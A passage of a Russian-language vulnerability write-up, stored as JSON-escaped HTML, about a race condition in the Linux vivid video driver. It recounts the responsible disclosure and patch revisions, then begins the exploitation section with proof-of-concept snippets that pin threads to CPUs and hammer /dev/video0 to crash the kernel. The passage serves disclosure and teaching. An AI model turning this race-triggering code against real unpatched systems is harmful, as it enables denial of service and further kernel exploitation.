\u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u0441\u043d\u043e\u0432\u0430. \u041a\u043e\u0433\u0434\u0430 \u0434\u0430\u043d\u043d\u0430\u044f \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u043f\u0440\u0438 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433\u0430, \u0432 \u0445\u0443\u0434\u0448\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0435 <code>kthread<\/code> \u0443\u0439\u0434\u0435\u0442 \u0432 \u0441\u043e\u043d \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437, \u0430 \u043f\u043e\u0442\u043e\u043c \u0432\u044b\u0439\u0434\u0435\u0442 \u0438\u0437 \u0446\u0438\u043a\u043b\u0430 \u043f\u043e\u0441\u043b\u0435 \u0441\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u043d\u0438\u044f <code>kthread_stop()<\/code> \u0432 \u043f\u0430\u0440\u0430\u043b\u043b\u0435\u043b\u044c\u043d\u043e\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435. \u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 <code>kthread<\/code> \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0441\u043e\u0432\u0441\u0435\u043c \u0431\u0435\u0437 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 (\u043c\u043e\u0436\u043d\u043e \u0441\u043a\u0430\u0437\u0430\u0442\u044c, lockless).<\/p>\n<p>  <\/p>\n<h2 id=\"zasnut-byvaet-ne-tak-prosto\">\u0417\u0430\u0441\u043d\u0443\u0442\u044c \u0431\u044b\u0432\u0430\u0435\u0442 \u043d\u0435 \u0442\u0430\u043a \u043f\u0440\u043e\u0441\u0442\u043e<\/h2>\n<p>  <\/p>\n<p>\u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u043d\u0430\u0434 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043b \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u0443 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0440\u0430\u0437\u0433\u043b\u0430\u0448\u0435\u043d\u0438\u044f (\u0432 \u0442\u043e\u0442 \u043c\u043e\u043c\u0435\u043d\u0442 \u044f \u0431\u044b\u043b \u043d\u0430 Linux Security Summit \u0432 \u041b\u0438\u043e\u043d\u0435). \u042f \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043b \u0432 <code>security@kernel.org<\/code> \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0443, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0443\u044e \u043a \u043f\u0430\u0434\u0435\u043d\u0438\u044e \u044f\u0434\u0440\u0430 (\u0442\u0430\u043a\u043e\u0435 \u043e\u0431\u044b\u0447\u043d\u043e \u043d\u0430\u0437\u044b\u0432\u0430\u044e\u0442 PoC crasher).<\/p>\n<p>  <\/p>\n<p>\u041b\u0438\u043d\u0443\u0441 \u0422\u043e\u0440\u0432\u0430\u043b\u044c\u0434\u0441 \u043e\u0442\u0432\u0435\u0442\u0438\u043b \u043c\u0435\u043d\u0435\u0435 \u0447\u0435\u043c \u0447\u0435\u0440\u0435\u0437 \u0434\u0432\u0430 \u0447\u0430\u0441\u0430 (\u043a\u0440\u0443\u0442\u043e!). \u041e\u0431\u0449\u0435\u043d\u0438\u0435 \u0431\u044b\u043b\u043e \u043e\u0447\u0435\u043d\u044c \u043f\u0440\u0438\u044f\u0442\u043d\u044b\u043c (\u0432 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437). \u0412\u043c\u0435\u0441\u0442\u0435 \u0441 \u0442\u0435\u043c \u043f\u043e\u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043b\u043e\u0441\u044c \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0447\u0435\u0442\u044b\u0440\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0449\u0435\u0433\u043e \u043f\u0430\u0442\u0447\u0430, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u00ab\u043f\u043e\u0441\u043f\u0430\u0442\u044c\u00bb \u0432 \u044f\u0434\u0440\u0435 \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u043d\u0435 \u0442\u0430\u043a-\u0442\u043e \u043f\u0440\u043e\u0441\u0442\u043e.<\/p>\n<p>  <\/p>\n<p>\u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u043c\u043e\u0435\u0433\u043e \u043f\u0430\u0442\u0447\u0430 <code>kthread<\/code> \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u043d\u0435\u0443\u0434\u0430\u0447\u043d\u043e\u0439 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u043d\u0435 \u0441\u043f\u0430\u043b \u0432\u043e\u0432\u0441\u0435:<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">    if (!mutex_trylock(&amp;dev-&gt;mutex))         continue;<\/code><\/pre>\n<p>  <\/p>\n<p>\u042d\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u043e, \u043a\u0430\u043a \u0437\u0430\u043c\u0435\u0442\u0438\u043b \u041b\u0438\u043d\u0443\u0441, \u043f\u0440\u0438\u0432\u043d\u0435\u0441\u043b\u043e \u0434\u0440\u0443\u0433\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u2013 \u043d\u0435\u043f\u0440\u0435\u0440\u044b\u0432\u043d\u044b\u0439 \u0446\u0438\u043a\u043b (busy-loop), \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0437\u0430\u0432\u0438\u0441\u0430\u043d\u0438\u044e (deadlock) \u0432 \u044f\u0434\u0440\u0435 \u0441 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u043e\u0439 \u0432\u044b\u0442\u0435\u0441\u043d\u044f\u044e\u0449\u0435\u0439 \u043c\u043d\u043e\u0433\u043e\u0437\u0430\u0434\u0430\u0447\u043d\u043e\u0441\u0442\u044c\u044e. \u042f \u0441\u0442\u0430\u043b \u0438\u0441\u043f\u044b\u0442\u044b\u0432\u0430\u0442\u044c \u0441\u0432\u043e\u0439 <code>crasher<\/code> \u043d\u0430 \u044f\u0434\u0440\u0435, \u0441\u043e\u0431\u0440\u0430\u043d\u043d\u043e\u043c \u0441 \u043e\u043f\u0446\u0438\u0435\u0439 <code>CONFIG_PREEMPT_NONE=y<\/code>. \u0418 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u0447\u0435\u0440\u0435\u0437 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043c\u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0434\u043e\u0431\u0438\u0442\u044c\u0441\u044f \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043e\u043f\u0438\u0441\u0430\u043b \u041b\u0438\u043d\u0443\u0441.<\/p>\n<p>  <\/p>\n<p>\u0422\u043e\u0433\u0434\u0430 \u044f \u0432\u0435\u0440\u043d\u0443\u043b\u0441\u044f \u0441\u043e \u0432\u0442\u043e\u0440\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0435\u0439 \u043f\u0430\u0442\u0447\u0430, \u0433\u0434\u0435 <code>kthread<\/code> \u0434\u0435\u043b\u0430\u0435\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435:<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">    if (!mutex_trylock(&amp;dev-&gt;mutex)) {         schedule_timeout_interruptible(1);         continue;     }<\/code><\/pre>\n<p>  <\/p>\n<p>\u042f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u0444\u0443\u043d\u043a\u0446\u0438\u044e <code>schedule_timeout_interruptible()<\/code> \u043f\u043e \u043f\u0440\u0438\u043c\u0435\u0440\u0443 \u0434\u0440\u0443\u0433\u0438\u0445 \u0447\u0430\u0441\u0442\u0435\u0439 \u043a\u043e\u0434\u0430 \u0432 <code>vivid-kthread-cap.c<\/code>. \u0422\u043e\u0433\u0434\u0430 \u043c\u044d\u0439\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u044b \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u043b\u0438 \u043c\u0435\u043d\u044f \u0437\u0430\u043c\u0435\u043d\u0438\u0442\u044c \u0435\u0435 \u043d\u0430 <code>schedule_timeout()<\/code> \u0434\u043b\u044f \u0431\u043e\u043b\u044c\u0448\u0435\u0439 \u044f\u0441\u043d\u043e\u0441\u0442\u0438, \u0442\u0430\u043a \u043a\u0430\u043a \u044f\u0434\u0435\u0440\u043d\u044b\u0435 \u043f\u043e\u0442\u043e\u043a\u0438 \u043e\u0431\u044b\u0447\u043d\u043e \u043d\u0435 \u0434\u043e\u043b\u0436\u043d\u044b \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0441\u0438\u0433\u043d\u0430\u043b\u044b. \u042f \u0432\u043d\u0435\u0441 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f, \u043f\u0440\u043e\u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <code>PoC crasher<\/code> \u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043b \u0442\u0440\u0435\u0442\u044c\u044e \u0432\u0435\u0440\u0441\u0438\u044e \u043f\u0430\u0442\u0447\u0430.<\/p>\n<p>  <\/p>\n<p>\u041d\u043e \u0434\u0432\u0430 \u0434\u043d\u044f \u0441\u043f\u0443\u0441\u0442\u044f, \u0443\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u043f\u043e\u043b\u043d\u043e\u0433\u043e \u0440\u0430\u0437\u0433\u043b\u0430\u0448\u0435\u043d\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441 \u043c\u043e\u0435\u0439 \u0441\u0442\u043e\u0440\u043e\u043d\u044b, \u041b\u0438\u043d\u0443\u0441 <a href=\"https:\/\/lore.kernel.org\/lkml\/CAHk-=wgE-veRb7+mw9oMmsD97BLnL+q8Gxu0QRrK65S2yQfMdQ@mail.gmail.com\/\">\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b<\/a> \u043d\u0435\u043f\u043e\u043b\u0430\u0434\u043a\u0443:<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">I just realized that this too is wrong. It _works_, but because it doesn't actually set the task state to anything particular before scheduling, it's basically pointless. It calls the scheduler, but it won't delay anything, because the task stays runnable.  So what you presumably want to use is either &quot;cond_resched()&quot; (to make sure others get to run with no delay) or &quot;schedule_timeout_uninterruptible(1)&quot; which actually sets the process state to TASK_UNINTERRUPTIBLE.  The above works, but it's basically nonsensical.<\/code><\/pre>\n<p>  <\/p>\n<p>\u0418\u043d\u044b\u043c\u0438 \u0441\u043b\u043e\u0432\u0430\u043c\u0438, \u0432 \u0442\u0440\u0435\u0442\u044c\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u043f\u0430\u0442\u0447\u0430 \u044f\u0434\u0440\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e \u043f\u043e \u0447\u0438\u0441\u0442\u043e\u0439 \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u043e\u0441\u0442\u0438. \u0410 \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u044f\u0434\u0435\u0440\u043d\u044b\u0439 \u043f\u043e\u0442\u043e\u043a \u043f\u043e\u0441\u043f\u0430\u0442\u044c, \u043d\u0443\u0436\u043d\u043e \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0437\u0430\u0434\u0430\u0442\u044c \u0435\u043c\u0443 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435, \u043e\u0442\u043b\u0438\u0447\u043d\u043e\u0435 \u043e\u0442 <code>TASK_RUNNING<\/code>. \u042f \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b \u044d\u0442\u043e\u0442 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u043a \u0432 \u0444\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u043f\u0430\u0442\u0447\u0430.<\/p>\n<p>  <\/p>\n<p>\u041f\u043e\u0437\u0436\u0435 \u043c\u043d\u0435 \u043f\u0440\u0438\u0448\u043b\u0430 \u043c\u044b\u0441\u043b\u044c \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432 \u044f\u0434\u0440\u043e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u0442 \u0442\u0430\u043a\u0438\u0435 \u0441\u043b\u0443\u0447\u0430\u0438 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e API. \u042f <a href=\"https:\/\/lore.kernel.org\/lkml\/20200116140218.1328022-1-alex.popov@linux.com\/T\/#u\">\u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043b<\/a> \u0432 \u0441\u043f\u0438\u0441\u043e\u043a \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0438 \u044f\u0434\u0440\u0430 Linux \u043f\u0430\u0442\u0447, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 <a href=\"https:\/\/lore.kernel.org\/lkml\/20200116095220.7368a604@gandalf.local.home\/\">\u043e\u0442\u0432\u0435\u0442\u0438\u043b<\/a> \u0421\u0442\u0438\u0432\u0435\u043d \u0420\u043e\u0441\u0442\u0435\u0434\u0442 (Steven Rostedt), \u043e\u0434\u0438\u043d \u0438\u0437 \u043c\u044d\u0439\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432 \u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0449\u0438\u043a\u0430 \u0437\u0430\u0434\u0430\u0447 \u0432 \u044f\u0434\u0440\u0435 Linux. \u041e\u043d \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e \u043e\u0431\u044a\u044f\u0441\u043d\u0438\u043b, \u043f\u043e\u0447\u0435\u043c\u0443 \u0442\u0430\u043a\u0430\u044f \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f \u0432 \u0440\u0430\u0431\u043e\u0442\u0435 \u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0449\u0438\u043a\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0448\u0442\u0430\u0442\u043d\u043e\u0439 \u0438 \u043c\u043e\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f.<\/p>\n<p>  <\/p>\n<p>\u0422\u043e\u0433\u0434\u0430 \u044f \u043f\u0440\u043e\u0441\u0442\u043e <a href=\"https:\/\/lore.kernel.org\/lkml\/20200117225900.16340-1-alex.popov@linux.com\/T\/#u\">\u0434\u043e\u0440\u0430\u0431\u043e\u0442\u0430\u043b \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435<\/a> \u0444\u0443\u043d\u043a\u0446\u0438\u0438 <code>schedule_timeout()<\/code>, \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0435\u0440\u0435\u0447\u044c \u0434\u0440\u0443\u0433\u0438\u0445 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u043e\u0442 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u043e\u0433\u043e API. \u041f\u0430\u0442\u0447 \u0443\u0436\u0435 \u043f\u0440\u0438\u043d\u044f\u0442 \u0432 \u0432\u0435\u0442\u043a\u0443 <code>linux-next<\/code>.<\/p>\n<p>  <\/p>\n<p>\u0412\u043e\u0442 \u0442\u0430\u043a \u043d\u0435\u043f\u0440\u043e\u0441\u0442\u043e \u0438\u043d\u043e\u0433\u0434\u0430 \u0431\u044b\u0432\u0430\u0435\u0442 \u0437\u0430\u0441\u043d\u0443\u0442\u044c \ud83d\ude42<\/p>\n<p>  <\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u044f \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0443 \u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0435.<\/p>\n<p>  <\/p>\n<h2 id=\"vyigrat-gonku\">\u0412\u044b\u0438\u0433\u0440\u0430\u0442\u044c \u0433\u043e\u043d\u043a\u0443<\/h2>\n<p>  <\/p>\n<p>\u041a\u0430\u043a \u0431\u044b\u043b\u043e \u0441\u043a\u0430\u0437\u0430\u043d\u043e \u0440\u0430\u043d\u0435\u0435, \u0444\u0443\u043d\u043a\u0446\u0438\u044f <code>vivid_stop_generating_vid_cap()<\/code> \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0432 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u043c \u044f\u0434\u0435\u0440\u043d\u043e\u043c \u043f\u043e\u0442\u043e\u043a\u0435. \u0412 \u043d\u0435\u0439 \u043c\u044c\u044e\u0442\u0435\u043a\u0441 \u0440\u0430\u0437\u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432 \u043d\u0430\u0434\u0435\u0436\u0434\u0435, \u0447\u0442\u043e \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a <code>vivid_thread_vid_cap()<\/code> \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u044f\u0434\u0435\u0440\u043d\u043e\u043c \u043f\u043e\u0442\u043e\u043a\u0435 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 \u0435\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u0432\u044b\u0439\u0442\u0438 \u0438\u0437 \u0441\u0432\u043e\u0435\u0433\u043e \u0446\u0438\u043a\u043b\u0430. \u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0432\u044b\u0438\u0433\u0440\u0430\u0442\u044c \u0433\u043e\u043d\u043a\u0443 \u043f\u0440\u043e\u0442\u0438\u0432 \u044d\u0442\u043e\u0433\u043e \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u043f\u043e\u0442\u043e\u043a\u0430.<\/p>\n<p>  <\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043d <a href=\"https:\/\/a13xp0p0v.github.io\/img\/v4l2-crasher.c\">\u043a\u043e\u0434 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b<\/a>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0434\u043e\u0441\u0442\u0438\u0433\u0430\u0435\u0442 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0433\u043e\u043d\u043a\u0438 \u0438 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u043f\u0430\u0434\u0435\u043d\u0438\u0435 \u044f\u0434\u0440\u0430. \u0415\u0441\u043b\u0438 \u0432\u044b \u0445\u043e\u0442\u0438\u0442\u0435 \u043f\u0440\u043e\u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0435\u0435 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c \u044f\u0434\u0440\u0435, \u043f\u0440\u043e\u0432\u0435\u0440\u044c\u0442\u0435, \u0447\u0442\u043e:<\/p>\n<p>  <\/p>\n<ul>\n<li>\u0434\u0440\u0430\u0439\u0432\u0435\u0440 <code>vivid<\/code> \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d;<\/li>\n<li>\u0432 \u044f\u0434\u0435\u0440\u043d\u043e\u043c \u0436\u0443\u0440\u043d\u0430\u043b\u0435 \u0443\u043a\u0430\u0437\u0430\u043d\u043e, \u0447\u0442\u043e <code>\/dev\/video0<\/code> \u2013 \u044d\u0442\u043e \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e \u0432\u0438\u0434\u0435\u043e\u0437\u0430\u0445\u0432\u0430\u0442\u0430 (<code>V4L2<\/code> capture device);<\/li>\n<li>\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043b \u0432\u0445\u043e\u0434 (login) \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443, \u0447\u0442\u043e\u0431\u044b Ubuntu \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u043b\u0430 RW ACL, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442 \u0432\u044b\u0448\u0435.<\/li>\n<\/ul>\n<p>  <\/p>\n<p>\u0414\u0430\u043d\u043d\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0434\u0432\u0430 \u043f\u043e\u0442\u043e\u043a\u0430. \u0427\u0442\u043e\u0431\u044b \u0431\u044b\u0441\u0442\u0440\u0435\u0435 \u0434\u043e\u0441\u0442\u0438\u0447\u044c \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0433\u043e\u043d\u043a\u0438 \u0432 \u044f\u0434\u0440\u0435, \u043e\u043d\u0438 \u043f\u0440\u0438\u0432\u044f\u0437\u044b\u0432\u0430\u044e\u0442\u0441\u044f \u043a \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u043c CPU \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <code>sched_setaffinity<\/code>:<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">    cpu_set_t single_cpu;      CPU_ZERO(&amp;single_cpu);     CPU_SET(cpu_n, &amp;single_cpu);     ret = sched_setaffinity(0, sizeof(single_cpu), &amp;single_cpu);     if (ret != 0)         err_exit(&quot;[-] sched_setaffinity for a single CPU&quot;);<\/code><\/pre>\n<p>  <\/p>\n<p>\u0412\u043e\u0442 \u043a\u043e\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u043e\u0432\u043e\u0446\u0438\u0440\u0443\u0435\u0442 \u043e\u0448\u0438\u0431\u043a\u0443 \u0432 \u044f\u0434\u0440\u0435 (\u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0432 \u0434\u0432\u0443\u0445 \u043e\u0434\u043d\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u043f\u043e\u0442\u043e\u043a\u0430\u0445):<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">    for (loop = 0; loop &lt; LOOP_N; loop++) {         int fd = 0;          fd = open(&quot;\/dev\/video0&quot;, O_RDWR);         if (fd &lt; 0)             err_exit(&quot;[-] open \/dev\/video0&quot;);          read(fd, buf, 0xfffded);         close(fd);     }<\/code><\/pre>\n<p>  <\/p>\n<p>\u0424\u0443\u043d\u043a\u0446\u0438\u044f <code>vid_cap_start_streaming()<\/code>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433, \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u043e\u0439 <code>V4L2<\/code> \u0438\u0437 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 <code>vb2_core_streamon()<\/code> \u043f\u0440\u0438 \u043f\u0435\u0440\u0432\u043e\u043c \u0447\u0442\u0435\u043d\u0438\u0438 \u0438\u0437 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0433\u043e \u0434\u0435\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430.<\/p>\n<p>  <\/p>\n<p>\u0424\u0443\u043d\u043a\u0446\u0438\u044f <code>vivid_stop_generating_vid_cap()<\/code>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433, \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u043e\u0439 <code>V4L2<\/code> \u0438\u0437 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 <code>__vb2_queue_cancel()<\/code> \u043f\u0440\u0438 \u043e\u043a\u043e\u043d\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u043c \u0437\u0430\u043a\u0440\u044b\u0442\u0438\u0438 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0433\u043e \u0434\u0435\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430.<\/p>\n<p>  <\/p>\n<p>\u0415\u0441\u043b\u0438 \u0434\u0440\u0443\u0433\u043e\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0447\u0442\u0435\u043d\u0438\u044f \u0432\u044b\u0438\u0433\u0440\u044b\u0432\u0430\u0435\u0442 \u0433\u043e\u043d\u043a\u0443 \u043f\u0440\u043e\u0442\u0438\u0432 \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u043f\u043e\u0442\u043e\u043a\u0430, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0449\u0435\u0433\u043e \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433, \u043e\u043d \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u044e <code>vb2_core_qbuf()<\/code> \u0438 \u043d\u0435\u043e\u0436\u0438\u0434\u0430\u043d\u043d\u043e \u0434\u043b\u044f <code>V4L2<\/code> \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442 \u0432 \u043e\u0447\u0435\u0440\u0435\u0434\u044c <code>vb2_queue.queued_list<\/code> 